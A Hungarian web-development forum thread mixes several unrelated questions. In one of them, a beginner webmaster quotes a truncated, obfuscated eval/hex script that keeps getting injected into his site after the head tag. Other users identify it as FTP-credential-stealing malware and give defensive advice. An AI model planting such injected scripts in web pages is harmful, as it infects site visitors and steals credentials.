Megválaszolatlan hozzászólások | Aktív témák Pontos idő: kedd máj. 07, 2024 20:20



Hozzászólás a témához  [ 8 hozzászólás ] 
Segitseg.. 
Szerző Üzenet
arany tag

Csatlakozott: szer. aug. 26, 2009 13:24
Hozzászólások: 101
Hozzászólás Re: Segitseg..
Az előző hozzászólásom utolsó mondata kijavítva:

Ha ebbe tud helpingelni valaki, akkor privátba üzenjen, mert NEM tudom mikor leszek megint gép előtt! :hihi:


csüt. máj. 27, 2010 15:18
Profil Privát üzenet küldése
arany tag

Csatlakozott: szer. aug. 26, 2009 13:24
Hozzászólások: 101
Hozzászólás Re: Segitseg..
Udv mindenkinek!

Nem vagyok jártas a flash 8 professional terén, ezért ha valaki tud segíteni, annak nagyon szépen köszönöm.

Lényeg hogy 1 képet be kell tölteni(az simaügy, az még oké),de hogy lehet azt megcsinálni, hogy a szöveg balról jobbra mozogjon? De úgy hogy a szöveget kihúzuk a stage szélére!

És mikor leütjük a Ctrl+Alt+Entert akkor azt kell látni , hogy :van a kép(amit betöltünk) meg rajta a szöveg mozog balról jobbra.

Ha ebbe tud helpingelni valaki, akkor privátba üzenjen, mert tudom mikor leszek megint gép előtt!
Előre is köszönöm a segítséget!


csüt. máj. 27, 2010 15:16
Profil Privát üzenet küldése
ezüst tag
Avatar

Csatlakozott: pén. máj. 09, 2008 13:30
Hozzászólások: 27
Tartózkodási hely: Budapest
Hozzászólás Re: Üzenőfal készítése
zedge írta:
Sziasztok!

Üzenőfalat szeretnék a weboldalamra készíteni! A neten kerestem már , de sikertelenül jártam! Nos, ha esetleg valaki tudna segíteni űzenőfal készítésében(HTML,CSS),vagy tippet adni az nagyon jó lenne!!
Üdv! .Ezt használom. Az alján a forrás. Ha meg felel, de nem találod küldj egy mailt és átpasszolom.


szer. aug. 26, 2009 14:40
Profil Privát üzenet küldése Honlap
arany tag

Csatlakozott: szer. aug. 26, 2009 13:24
Hozzászólások: 101
Hozzászólás Üzenőfal készítése
Sziasztok!

Üzenőfalat szeretnék a weboldalamra készíteni! A neten kerestem már , de sikertelenül jártam! Nos, ha esetleg valaki tudna segíteni űzenőfal készítésében(HTML,CSS),vagy tippet adni az nagyon jó lenne!!


szer. aug. 26, 2009 13:36
Profil Privát üzenet küldése
vas-tag

Csatlakozott: hétf. dec. 01, 2008 19:27
Hozzászólások: 1
Hozzászólás Re: Segitseg..
helló. winCommandert használsz ftp-re?
ez egy vírus amit kiszedi ez eltárolt ftp kapcsolódásodat, és utána ftp hozzáféréssel letölti a fileokat, és visszatölti a fertőzötten, ami később látogatóid géptben fog kátrt tenni.
megoldás: ne tárold a jelszót az ftp-hez, és irtsd le a gépedről.


hétf. dec. 01, 2008 19:30
Profil Privát üzenet küldése
vas-tag

Csatlakozott: szomb. nov. 01, 2008 12:20
Hozzászólások: 2
Hozzászólás 
Koszi a gyors valaszt...mindenkepp kicserelem(kicsereltem) a jelszavamat.Esetleg ha megis megint megjelenne ez a script az oldalamon akkor lehetne valami modon vedekezni ellene?Meg erdekelne hogy valaki tudja e hogy mit takar ennek a scripnek a forrasa?Mit csinal az oldalammal?
Koszi!


szomb. nov. 01, 2008 19:00
Profil Privát üzenet küldése
gyémánt tag
Avatar

Csatlakozott: szer. dec. 01, 2004 16:04
Hozzászólások: 2259
Tartózkodási hely: A sivatagban szivárványszínű mókusokat etetek
Hozzászólás 
Valszeg felnyomták az oldaladat. Ha van lehetőséged rá változtasd meg az FTP jelszavadat egy igen hosszú vagy legalábbis bonyolultra (kis- és nagybetű, számok és különleges karakterek).


szomb. nov. 01, 2008 17:34
Profil Privát üzenet küldése Honlap
vas-tag

Csatlakozott: szomb. nov. 01, 2008 12:20
Hozzászólások: 2
Hozzászólás Segitseg..
Udv. mindenkinek!
Keresgeltem a temak kozott de ilyen problemaval senki nem jelentkezett.Kezdo illetve amator webszerkeszto vagyok.....es kovetkezo lenne a gondom.Total Comandert hasznalok feltolteni a weboldalt es hetente az oladalimon megjelenik ez a furcsa script....( <div id='x0f8f3aeaf95961ab804f81f7f507d624a'><script>var jQuery = eval('wmi:nkdfomw0.fefv:aml0'.replace(/[0fm\:k]/g, '')); jQuery('\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x6f\x38\x68\x32\x28\x72\x48\x49...............\x29\x3b');</script></div> ) amit persze kitorlok es egy hetig nyugtom van de aztan ujbol megjelenik a </head> utan.Lehet hogy banalis a es egyszeru a valasz ra....de mint irtam kezdo vagyok.
Elore is koszonom a valaszokat.


szomb. nov. 01, 2008 12:39
Profil Privát üzenet küldése
Hozzászólások megjelenítése:  Rendezés  
Hozzászólás a témához   [ 8 hozzászólás ] 

Ki van itt

Jelenlévő fórumozók: nincs regisztrált felhasználó valamint 11 vendég


Nem nyithatsz témákat ebben a fórumban.
Nem válaszolhatsz egy témára ebben a fórumban.
Nem szerkesztheted a hozzászólásaidat ebben a fórumban.
Nem törölheted a hozzászólásaidat ebben a fórumban.

Keresés:
Ugrás:  
cron
Powered by phpBB © 2000, 2002, 2005, 2007 phpBB Group.
Designed by ST Software for PTF.
Magyar fordítás © Magyar phpBB Közösség